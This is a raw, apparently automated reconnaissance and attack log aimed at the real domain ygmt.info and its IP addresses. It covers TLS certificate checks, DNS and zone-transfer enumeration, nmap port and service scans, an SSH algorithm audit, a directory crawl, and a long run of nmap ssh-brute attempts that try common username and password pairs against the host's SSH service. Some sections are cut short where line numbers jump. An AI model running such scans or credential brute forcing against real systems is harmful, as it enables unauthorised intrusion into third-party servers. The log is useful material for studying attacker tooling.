1155 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1156 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1157 Java CA Store (jdk-12.0.1): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1158 Mozilla CA Store (2019-03-14): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1159 Windows CA Store (2019-05-27): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1160 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
1161 Received Chain: ygmt.info --> Go Daddy Secure Certificate Authority - G2 --> Go Daddy Root Certificate Authority - G2 --> countryName=US, organizationName=The Go Daddy Group, Inc., organizationalUnitName=Go Daddy Class 2 Certification Authority
1162 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
1163 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
1164 Received Chain Order: FAILED - Certificate chain out of order!
1165 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
1166
1167 Extensions
1168 OCSP Must-Staple: NOT SUPPORTED - Extension not found
1169 Certificate Transparency: NOT SUPPORTED - Extension not found
1170
1171 OCSP Stapling
1172 NOT SUPPORTED - Server did not send back an OCSP response
1173
1174 * OpenSSL CCS Injection:
1175 OK - Not vulnerable to OpenSSL CCS injection
1176
1177 * Session Renegotiation:
1178 Client-initiated Renegotiation: OK - Rejected
1179 Secure Renegotiation: OK - Supported
1180
1181 * SSLV2 Cipher Suites:
1182 Server rejected all cipher suites.
1183
1184 * SSLV3 Cipher Suites:
1185 Server rejected all cipher suites.
1186
1187 * OpenSSL Heartbleed:
1188 OK - Not vulnerable to Heartbleed
1189
1190 * TLSV1_3 Cipher Suites:
1191 Server rejected all cipher suites.
1192
1193 * ROBOT Attack:
1194 OK - Not vulnerable
1195
1196
1197 SCAN COMPLETED IN 27.82 S
1198 -------------------------
1199######################################################################################################################################
1200Domains still to check: 1
1201 Checking if the hostname ygmt.info. given is in fact a domain...
1202
1203Analyzing domain: ygmt.info.
1204 Checking NameServers using system default resolver...
1205 IP: 104.216.69.250 (United States)
1206 HostName: freedns2.registrar-servers.com Type: NS
1207 HostName: freedns2.registrar-servers.com Type: PTR
1208 IP: 54.36.109.15 (Germany)
1209 HostName: freedns5.registrar-servers.com Type: NS
1210 HostName: freedns5.registrar-servers.com Type: PTR
1211 IP: 195.154.94.174 (France)
1212 HostName: freedns3.registrar-servers.com Type: NS
1213 HostName: freedns3.registrar-servers.com Type: PTR
1214 IP: 95.141.37.127 (Italy)
1215 HostName: freedns4.registrar-servers.com Type: NS
1216 HostName: freedns4.registrar-servers.com Type: PTR
1217 IP: 45.58.122.82 (United States)
1218 HostName: freedns1.registrar-servers.com Type: NS
1219
1220 Checking MailServers using system default resolver...
1221 WARNING!! There are no MX records for this domain
1222
1223 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
1224 No zone transfer found on nameserver 195.154.94.174
1225 No zone transfer found on nameserver 45.58.122.82
1226 No zone transfer found on nameserver 104.216.69.250
1227 No zone transfer found on nameserver 54.36.109.15
1228 No zone transfer found on nameserver 95.141.37.127
1229
1230 Checking SPF record...
1231 No SPF record
1232
1233 Checking 192 most common hostnames using system default resolver...
1234 IP: 185.82.200.52 (Netherlands)
1235 HostName: www.ygmt.info. Type: A
1236
1237 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
1238 Checking netblock 185.82.200.0
1239 Checking netblock 195.154.94.0
1240 Checking netblock 54.36.109.0
1241 Checking netblock 45.58.122.0
1242 Checking netblock 104.216.69.0
1243 Checking netblock 95.141.37.0
1244
1245 Searching for ygmt.info. emails in Google
1246
1247 Checking 6 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
1248 Host 185.82.200.52 is up (reset ttl 64)
1249 Host 195.154.94.174 is up (reset ttl 64)
1250 Host 54.36.109.15 is up (reset ttl 64)
1251 Host 45.58.122.82 is up (echo-reply ttl 51)
1252 Host 104.216.69.250 is up (reset ttl 64)
1253 Host 95.141.37.127 is up (reset ttl 64)
1254
1255 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
1256 Scanning ip 185.82.200.52 (www.ygmt.info.):
1257 22/tcp open ssh syn-ack ttl 51 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
1258 | ssh-hostkey:
1259 | 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
1260 | 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
1261 | 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
1262 |_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
1263 80/tcp open http syn-ack ttl 51 Apache httpd 2.4.10 ((Debian))
1264 | http-methods:
1265 |_ Supported Methods: GET HEAD POST OPTIONS
1266 |_http-server-header: Apache/2.4.10 (Debian)
1267 |_http-title: MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYM...
1268 443/tcp open ssl/http syn-ack ttl 51 Apache httpd 2.4.10 ((Debian))
1269 |_http-favicon: Unknown favicon MD5: 216B1DF79EDF8917840C49A34B86B823
1270 | http-methods:
1271 |_ Supported Methods: GET HEAD POST OPTIONS
1272 |_http-server-header: Apache/2.4.10 (Debian)
1273 |_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
1274 | ssl-cert: Subject: commonName=ygmt.info
1275 | Subject Alternative Name: DNS:ygmt.info, DNS:www.ygmt.info
1276 | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1277 | Public Key type: rsa
1278 | Public Key bits: 2048
1279 | Signature Algorithm: sha256WithRSAEncryption
1280 | Not valid before: 2017-02-14T00:00:00
1281 | Not valid after: 2018-02-14T23:59:59
1282 | MD5: b8e6 d17f a421 4c77 d48e 9e61 b23e 6971
1283 |_SHA-1: c46e 6ea4 c40d 22da 6302 a416 b68b f8a8 90b8 f667
1284 |_ssl-date: TLS randomness does not represent time
1285 10000/tcp open http syn-ack ttl 51 MiniServ 1.910 (Webmin httpd)
1286 |_http-favicon: Unknown favicon MD5: 65A103EF6B83A5BBBAB46C83651063C9
1287 | http-methods:
1288 |_ Supported Methods: GET HEAD POST OPTIONS
1289 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
1290 OS Info: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1291 Scanning ip 195.154.94.174 (freedns3.registrar-servers.com (PTR)):
1292 Scanning ip 54.36.109.15 (freedns5.registrar-servers.com (PTR)):
1293 53/tcp open domain? syn-ack ttl 49
1294 | dns-nsid:
1295 | NSID: freedns5.registrar-servers.com (66726565646e73352e7265676973747261722d736572766572732e636f6d)
1296 |_ id.server: freedns5.registrar-servers.com
1297 | fingerprint-strings:
1298 | DNSVersionBindReqTCP:
1299 | version
1300 |_ bind
1301 Scanning ip 45.58.122.82 (freedns1.registrar-servers.com):
1302 53/tcp open domain? syn-ack ttl 51
1303 | dns-nsid:
1304 | NSID: freedns1.registrar-servers.com (66726565646e73312e7265676973747261722d736572766572732e636f6d)
1305 |_ id.server: freedns1.registrar-servers.com
1306 | fingerprint-strings:
1307 | DNSVersionBindReqTCP:
1308 | version
1309 |_ bind
1310 Scanning ip 104.216.69.250 (freedns2.registrar-servers.com (PTR)):
1311 53/tcp open domain? syn-ack ttl 52
1312 | dns-nsid:
1313 | NSID: freedns2.registrar-servers.com (66726565646e73322e7265676973747261722d736572766572732e636f6d)
1314 |_ id.server: freedns2.registrar-servers.com
1315 | fingerprint-strings:
1316 | DNSVersionBindReqTCP:
1317 | version
1318 |_ bind
1319 Scanning ip 95.141.37.127 (freedns4.registrar-servers.com (PTR)):
1320 53/tcp open domain? syn-ack ttl 50
1321 | dns-nsid:
1322 | NSID: freedns4.registrar-servers.com (66726565646e73342e7265676973747261722d736572766572732e636f6d)
1323 |_ id.server: freedns4.registrar-servers.com
1324 | fingerprint-strings:
1325 | DNSVersionBindReqTCP:
1326 | version
1327 |_ bind
1328 WebCrawling domain's web servers... up to 50 max links.
1329
1330 + URL to crawl: http://www.ygmt.info.
1331 + Date: 2019-10-06
1332
1333 + Crawling URL: http://www.ygmt.info.:
1334 + Links:
1335 + Crawling http://www.ygmt.info.
1336 + Crawling http://www.ygmt.info./top50/index.php
1337 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Free+Sites&start=1
1338 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Pay+Sites&start=1
1339 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Nonude+Sites&start=1
1340 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Security&start=1
1341 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Top+Lists&start=1
1342 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Book+Stores&start=1
1343 + Searching for directories...
1344 - Found: http://www.ygmt.info./top50/
1345 - Found: http://www.ygmt.info./top50/css/
1346 - Found: http://www.ygmt.info./top50/js/
1347 - Found: http://www.ygmt.info./bn/
1348 - Found: http://www.ygmt.info./top50/skins/
1349 - Found: http://www.ygmt.info./top50/skins/photo50/
1350 - Found: http://www.ygmt.info./banner/
1351 + Searching open folders...
1352 - http://www.ygmt.info./top50/ (No Open Folder)
1353 - http://www.ygmt.info./top50/css/ (403 Forbidden)
1354 - http://www.ygmt.info./top50/js/ (403 Forbidden)
1355 - http://www.ygmt.info./bn/ (403 Forbidden)
1356 - http://www.ygmt.info./top50/skins/ (403 Forbidden)
1357 - http://www.ygmt.info./top50/skins/photo50/ (403 Forbidden)
1358 - http://www.ygmt.info./banner/ (403 Forbidden)
1359 + Crawl finished successfully.
1360----------------------------------------------------------------------
1361Summary of http://http://www.ygmt.info.
1362----------------------------------------------------------------------
1363+ Links crawled:
1364 - http://www.ygmt.info.
1365 - http://www.ygmt.info./top50/index.php
1366 - http://www.ygmt.info./top50/index.php?method=in&cat=Book+Stores&start=1
1367 - http://www.ygmt.info./top50/index.php?method=in&cat=Free+Sites&start=1
1368 - http://www.ygmt.info./top50/index.php?method=in&cat=Nonude+Sites&start=1
1369 - http://www.ygmt.info./top50/index.php?method=in&cat=Pay+Sites&start=1
1370 - http://www.ygmt.info./top50/index.php?method=in&cat=Security&start=1
1371 - http://www.ygmt.info./top50/index.php?method=in&cat=Top+Lists&start=1
1372 Total links crawled: 8
1373
1374+ Links to files found:
1403 Total links to files: 28
1404
1405+ Externals links found:
1672 Total external links: 266
1673
1674+ Email addresses found:
1675 Total email address found: 0
1676
1677+ Directories found:
1678 - http://www.ygmt.info./banner/ (403 Forbidden)
1679 - http://www.ygmt.info./bn/ (403 Forbidden)
1680 - http://www.ygmt.info./top50/ (No open folder)
1681 - http://www.ygmt.info./top50/css/ (403 Forbidden)
1682 - http://www.ygmt.info./top50/js/ (403 Forbidden)
1683 - http://www.ygmt.info./top50/skins/ (403 Forbidden)
1684 - http://www.ygmt.info./top50/skins/photo50/ (403 Forbidden)
1685 Total directories: 7
1686
1687+ Directory indexing found:
1688 Total directories with indexing: 0
1689
1690----------------------------------------------------------------------
1691
1692
1693 + URL to crawl: https://www.ygmt.info.
1694 + Date: 2019-10-06
1695
1696 + Crawling URL: https://www.ygmt.info.:
1697 + Links:
1698 + Crawling https://www.ygmt.info. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1699 + Searching for directories...
1700 + Searching open folders...
1701
1702
1703 + URL to crawl: http://www.ygmt.info.:10000
1704 + Date: 2019-10-06
1705
1706 + Crawling URL: http://www.ygmt.info.:10000:
1707 + Links:
1708 + Crawling http://www.ygmt.info.:10000
1709 + Searching for directories...
1710 + Searching open folders...
1711
1712--Finished--
1713Summary information for domain ygmt.info.
1714-----------------------------------------
1715
1716 Domain Ips Information:
1717 IP: 185.82.200.52
1718 HostName: www.ygmt.info. Type: A
1719 Country: Netherlands
1720 Is Active: True (reset ttl 64)
1721 Port: 22/tcp open ssh syn-ack ttl 51 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
1722 Script Info: | ssh-hostkey:
1723 Script Info: | 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
1724 Script Info: | 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
1725 Script Info: | 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
1726 Script Info: |_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
1727 Port: 80/tcp open http syn-ack ttl 51 Apache httpd 2.4.10 ((Debian))
1728 Script Info: | http-methods:
1729 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1730 Script Info: |_http-server-header: Apache/2.4.10 (Debian)
1731 Script Info: |_http-title: MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYM...
1732 Port: 443/tcp open ssl/http syn-ack ttl 51 Apache httpd 2.4.10 ((Debian))
1733 Script Info: |_http-favicon: Unknown favicon MD5: 216B1DF79EDF8917840C49A34B86B823
1734 Script Info: | http-methods:
1735 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1736 Script Info: |_http-server-header: Apache/2.4.10 (Debian)
1737 Script Info: |_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
1738 Script Info: | ssl-cert: Subject: commonName=ygmt.info
1739 Script Info: | Subject Alternative Name: DNS:ygmt.info, DNS:www.ygmt.info
1740 Script Info: | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1741 Script Info: | Public Key type: rsa
1742 Script Info: | Public Key bits: 2048
1743 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1744 Script Info: | Not valid before: 2017-02-14T00:00:00
1745 Script Info: | Not valid after: 2018-02-14T23:59:59
1746 Script Info: | MD5: b8e6 d17f a421 4c77 d48e 9e61 b23e 6971
1747 Script Info: |_SHA-1: c46e 6ea4 c40d 22da 6302 a416 b68b f8a8 90b8 f667
1748 Script Info: |_ssl-date: TLS randomness does not represent time
1749 Port: 10000/tcp open http syn-ack ttl 51 MiniServ 1.910 (Webmin httpd)
1750 Script Info: |_http-favicon: Unknown favicon MD5: 65A103EF6B83A5BBBAB46C83651063C9
1751 Script Info: | http-methods:
1752 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1753 Script Info: |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
1754 Os Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1755 IP: 195.154.94.174
1756 HostName: freedns3.registrar-servers.com Type: NS
1757 HostName: freedns3.registrar-servers.com Type: PTR
1758 Country: France
1759 Is Active: True (reset ttl 64)
1760 IP: 54.36.109.15
1761 HostName: freedns5.registrar-servers.com Type: NS
1762 HostName: freedns5.registrar-servers.com Type: PTR
1763 Country: Germany
1764 Is Active: True (reset ttl 64)
1765 Port: 53/tcp open domain? syn-ack ttl 49
1766 Script Info: | dns-nsid:
1767 Script Info: | NSID: freedns5.registrar-servers.com (66726565646e73352e7265676973747261722d736572766572732e636f6d)
1768 Script Info: |_ id.server: freedns5.registrar-servers.com
1769 Script Info: | fingerprint-strings:
1770 Script Info: | DNSVersionBindReqTCP:
1771 Script Info: | version
1772 Script Info: |_ bind
1773 IP: 45.58.122.82
1774 HostName: freedns1.registrar-servers.com Type: NS
1775 Country: United States
1776 Is Active: True (echo-reply ttl 51)
1777 Port: 53/tcp open domain? syn-ack ttl 51
1778 Script Info: | dns-nsid:
1779 Script Info: | NSID: freedns1.registrar-servers.com (66726565646e73312e7265676973747261722d736572766572732e636f6d)
1780 Script Info: |_ id.server: freedns1.registrar-servers.com
1781 Script Info: | fingerprint-strings:
1782 Script Info: | DNSVersionBindReqTCP:
1783 Script Info: | version
1784 Script Info: |_ bind
1785 IP: 104.216.69.250
1786 HostName: freedns2.registrar-servers.com Type: NS
1787 HostName: freedns2.registrar-servers.com Type: PTR
1788 Country: United States
1789 Is Active: True (reset ttl 64)
1790 Port: 53/tcp open domain? syn-ack ttl 52
1791 Script Info: | dns-nsid:
1792 Script Info: | NSID: freedns2.registrar-servers.com (66726565646e73322e7265676973747261722d736572766572732e636f6d)
1793 Script Info: |_ id.server: freedns2.registrar-servers.com
1794 Script Info: | fingerprint-strings:
1795 Script Info: | DNSVersionBindReqTCP:
1796 Script Info: | version
1797 Script Info: |_ bind
1798 IP: 95.141.37.127
1799 HostName: freedns4.registrar-servers.com Type: NS
1800 HostName: freedns4.registrar-servers.com Type: PTR
1801 Country: Italy
1802 Is Active: True (reset ttl 64)
1803 Port: 53/tcp open domain? syn-ack ttl 50
1804 Script Info: | dns-nsid:
1805 Script Info: | NSID: freedns4.registrar-servers.com (66726565646e73342e7265676973747261722d736572766572732e636f6d)
1806 Script Info: |_ id.server: freedns4.registrar-servers.com
1807 Script Info: | fingerprint-strings:
1808 Script Info: | DNSVersionBindReqTCP:
1809 Script Info: | version
1810 Script Info: |_ bind
1811######################################################################################################################################
1812Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:20 EDT
1813Nmap scan report for www.ygmt.info (185.82.200.52)
1814Host is up (0.12s latency).
1815rDNS record for 185.82.200.52: latina.petite.guru
1816Not shown: 479 closed ports
1817PORT STATE SERVICE
181822/tcp open ssh
181980/tcp open http
1820443/tcp open https
182110000/tcp open snet-sensor-mgmt
1822
1823Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds
1824#######################################################################################################################################
1825Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:20 EDT
1826Nmap scan report for www.ygmt.info (185.82.200.52)
1827Host is up (0.085s latency).
1828rDNS record for 185.82.200.52: latina.petite.guru
1829Not shown: 8 closed ports, 2 filtered ports
1830PORT STATE SERVICE
183168/udp open|filtered dhcpc
183288/udp open|filtered kerberos-sec
1833123/udp open|filtered ntp
1834161/udp open|filtered snmp
1835500/udp open|filtered isakmp
1836
1837Nmap done: 1 IP address (1 host up) scanned in 3.34 seconds
1838#########################################################################################################################################
1839# general
1840(gen) banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
1841(gen) software: OpenSSH 6.7p1
1842(gen) compatibility: OpenSSH 6.5-6.9, Dropbear SSH 2013.62+
1843(gen) compression: enabled (zlib@openssh.com)
1844
1845# key exchange algorithms
1846(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
1847(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
1848 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1849(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
1850 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1851(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
1852 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1853(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1854 `- [info] available since OpenSSH 4.4
1855(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1856 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1857
1858# host-key algorithms
1859(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1860(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
1861 `- [warn] using small 1024-bit modulus
1862 `- [warn] using weak random number generator could reveal the key
1863 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1864(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
1865 `- [warn] using weak random number generator could reveal the key
1866 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1867(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
1868
1869# encryption algorithms (ciphers)
1870(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1871(enc) aes192-ctr -- [info] available since OpenSSH 3.7
1872(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1873(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
1874(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
1875(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
1876 `- [info] default cipher since OpenSSH 6.9.
1877
1878# message authentication code algorithms
1879(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
1880 `- [info] available since OpenSSH 6.2
1881(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
1882(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
1883(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
1884(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
1885 `- [info] available since OpenSSH 6.2
1886(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1887 `- [warn] using small 64-bit tag size
1888 `- [info] available since OpenSSH 4.7
1889(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
1890 `- [info] available since OpenSSH 6.2
1891(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1892 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1893(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1894 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1895(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1896 `- [warn] using weak hashing algorithm
1897 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1898
1899# algorithm recommendations (for OpenSSH 6.7)
1900(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
1901(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
1902(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
1903(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1904(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
1905(rec) -ssh-dss -- key algorithm to remove
1906(rec) -hmac-sha2-512 -- mac algorithm to remove
1907(rec) -umac-128@openssh.com -- mac algorithm to remove
1908(rec) -hmac-sha2-256 -- mac algorithm to remove
1909(rec) -umac-64@openssh.com -- mac algorithm to remove
1910(rec) -hmac-sha1 -- mac algorithm to remove
1911(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
1912(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
1913#######################################################################################################################################
1914Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:20 EDT
1915NSE: [ssh-run] Failed to specify credentials and command to run.
2019NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
2020NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
2021NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
2022NSE: [ssh-brute] Trying username/password pair: guest:abc123
2023NSE: [ssh-brute] Trying username/password pair: user:abc123
2024NSE: [ssh-brute] Trying username/password pair: web:abc123
2025NSE: [ssh-brute] Trying username/password pair: test:abc123
2026NSE: [ssh-brute] Trying username/password pair: root:nicole
2027NSE: [ssh-brute] Trying username/password pair: admin:nicole
2028NSE: [ssh-brute] Trying username/password pair: administrator:nicole
2029NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
2030NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
2031NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
2032NSE: [ssh-brute] Trying username/password pair: guest:nicole
2033NSE: [ssh-brute] Trying username/password pair: user:nicole
2034NSE: [ssh-brute] Trying username/password pair: web:nicole
2035NSE: [ssh-brute] Trying username/password pair: test:nicole
2036NSE: [ssh-brute] Trying username/password pair: root:daniel
2037NSE: [ssh-brute] Trying username/password pair: admin:daniel
2038NSE: [ssh-brute] Trying username/password pair: administrator:daniel
2039NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
2040NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
2041NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
2042NSE: [ssh-brute] Trying username/password pair: guest:daniel
2043NSE: [ssh-brute] Trying username/password pair: user:daniel
2044NSE: [ssh-brute] Trying username/password pair: web:daniel
2045NSE: [ssh-brute] Trying username/password pair: test:daniel
2046NSE: [ssh-brute] Trying username/password pair: root:monkey
2047NSE: [ssh-brute] Trying username/password pair: admin:monkey
2048NSE: [ssh-brute] Trying username/password pair: administrator:monkey
2049NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
2050NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
2051NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
2052NSE: [ssh-brute] Trying username/password pair: guest:monkey
2053NSE: [ssh-brute] Trying username/password pair: user:monkey
2054NSE: [ssh-brute] Trying username/password pair: web:monkey
2055NSE: [ssh-brute] Trying username/password pair: test:monkey
2056NSE: [ssh-brute] Trying username/password pair: root:babygirl
2057NSE: [ssh-brute] Trying username/password pair: admin:babygirl
2058NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
2059NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
2060NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
2061NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
2062NSE: [ssh-brute] Trying username/password pair: guest:babygirl
2063NSE: [ssh-brute] Trying username/password pair: user:babygirl
2064NSE: [ssh-brute] Trying username/password pair: web:babygirl
2065NSE: [ssh-brute] Trying username/password pair: test:babygirl
2066NSE: [ssh-brute] Trying username/password pair: root:qwerty
2067NSE: [ssh-brute] Trying username/password pair: admin:qwerty
2068NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
2069NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
2070NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
2071NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
2072NSE: [ssh-brute] Trying username/password pair: guest:qwerty
2073NSE: [ssh-brute] Trying username/password pair: user:qwerty
2074NSE: [ssh-brute] Trying username/password pair: web:qwerty
2075NSE: [ssh-brute] Trying username/password pair: test:qwerty
2076NSE: [ssh-brute] Trying username/password pair: root:lovely
2077NSE: [ssh-brute] Trying username/password pair: admin:lovely
2078NSE: [ssh-brute] Trying username/password pair: administrator:lovely
2079NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
2080NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
2081NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
2082NSE: [ssh-brute] Trying username/password pair: guest:lovely
2083NSE: [ssh-brute] Trying username/password pair: user:lovely
2084NSE: [ssh-brute] Trying username/password pair: web:lovely
2085NSE: [ssh-brute] Trying username/password pair: test:lovely
2086NSE: [ssh-brute] Trying username/password pair: root:654321
2087NSE: [ssh-brute] Trying username/password pair: admin:654321
2088NSE: [ssh-brute] Trying username/password pair: administrator:654321
2089NSE: [ssh-brute] Trying username/password pair: webadmin:654321
2090NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
2091NSE: [ssh-brute] Trying username/password pair: netadmin:654321
2092NSE: [ssh-brute] Trying username/password pair: guest:654321
2093NSE: [ssh-brute] Trying username/password pair: user:654321
2094NSE: [ssh-brute] Trying username/password pair: web:654321
2095NSE: [ssh-brute] Trying username/password pair: test:654321
2096NSE: [ssh-brute] Trying username/password pair: root:michael
2097NSE: [ssh-brute] Trying username/password pair: admin:michael
2098NSE: [ssh-brute] Trying username/password pair: administrator:michael
2099NSE: [ssh-brute] Trying username/password pair: webadmin:michael
2100NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
2101NSE: [ssh-brute] Trying username/password pair: netadmin:michael
2102NSE: [ssh-brute] Trying username/password pair: guest:michael
2103NSE: [ssh-brute] Trying username/password pair: user:michael
2104NSE: [ssh-brute] Trying username/password pair: web:michael
2105NSE: [ssh-brute] Trying username/password pair: test:michael
2106NSE: [ssh-brute] Trying username/password pair: root:jessica
2107NSE: [ssh-brute] Trying username/password pair: admin:jessica
2108NSE: [ssh-brute] Trying username/password pair: administrator:jessica
2109NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
2110NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
2111NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
2112NSE: [ssh-brute] Trying username/password pair: guest:jessica
2113NSE: [ssh-brute] Trying username/password pair: user:jessica
2114NSE: [ssh-brute] Trying username/password pair: web:jessica
2115NSE: [ssh-brute] Trying username/password pair: test:jessica
2116NSE: [ssh-brute] Trying username/password pair: root:111111
2117NSE: [ssh-brute] Trying username/password pair: admin:111111
2118NSE: [ssh-brute] Trying username/password pair: administrator:111111
2119NSE: [ssh-brute] Trying username/password pair: webadmin:111111
2120NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
2121NSE: [ssh-brute] Trying username/password pair: netadmin:111111
2122NSE: [ssh-brute] Trying username/password pair: guest:111111
2123NSE: [ssh-brute] Trying username/password pair: user:111111
2124NSE: [ssh-brute] Trying username/password pair: web:111111
2125NSE: [ssh-brute] Trying username/password pair: test:111111
2126NSE: [ssh-brute] Trying username/password pair: root:ashley
2127NSE: [ssh-brute] Trying username/password pair: admin:ashley
2128NSE: [ssh-brute] Trying username/password pair: administrator:ashley
